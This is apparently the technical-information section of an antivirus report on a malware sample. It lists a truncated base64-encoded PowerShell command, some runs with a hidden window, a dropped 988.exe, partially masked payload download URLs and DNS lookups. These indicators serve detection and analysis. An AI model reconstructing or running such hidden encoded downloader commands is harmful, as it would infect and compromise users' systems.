Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB4AGEAbwB4AD0AJwBoAGkAZgBmAGEAbwB6AHcAaQBhAHoAagBpAGEAcgBoAG8AbwB5AHYAdQB1AHoAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAGAAYwB1AGAAUgBpAFQAWQBQAH...
- %HOMEPATH%\988.exe
- %HOMEPATH%\988.exe
- http://fi#####rcleanerstx.com/wp-content/mu-plugins/2CLid868/
- http://za###ajouk.com/cf9r4nd/Xsma350581/
- DNS ASK fi#####rcleanerstx.com
- DNS ASK bh####raexpress.com
- DNS ASK cr#.###ayanpharma.com
- DNS ASK za###ajouk.com
- DNS ASK e2####lution.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB4AGEAbwB4AD0AJwBoAGkAZgBmAGEAbwB6AHcAaQBhAHoAagBpAGEAcgBoAG8AbwB5AHYAdQB1AHoAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAGAAYwB1AGAAUgBpAFQAWQBQAH...' (with hidden window)